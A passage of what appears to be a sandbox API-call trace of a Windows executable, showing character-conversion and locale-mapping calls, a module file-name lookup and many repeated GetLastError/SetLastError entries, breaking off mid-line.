MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ訰ာ駾@Ā") returned 256 [0101.931] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ訰ာ駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.931] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ訰ာ駾@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x99Þ\x84\x11\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0101.931] GetLastError () returned 0x0 [0101.931] SetLastError (dwErrCode=0x0) [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ訰ာ駾@Ā") returned 256 [0101.931] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ訰ာ駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.931] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ訰ာ駾@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0101.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x99Þ\x84\x11\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0101.932] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a52a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xd0 [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.945] SetLastError (dwErrCode=0x0) [0101.945] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError (dwErrCode=0x0) [0101.946] GetLastError () returned 0x0 [0101.946] SetLastError 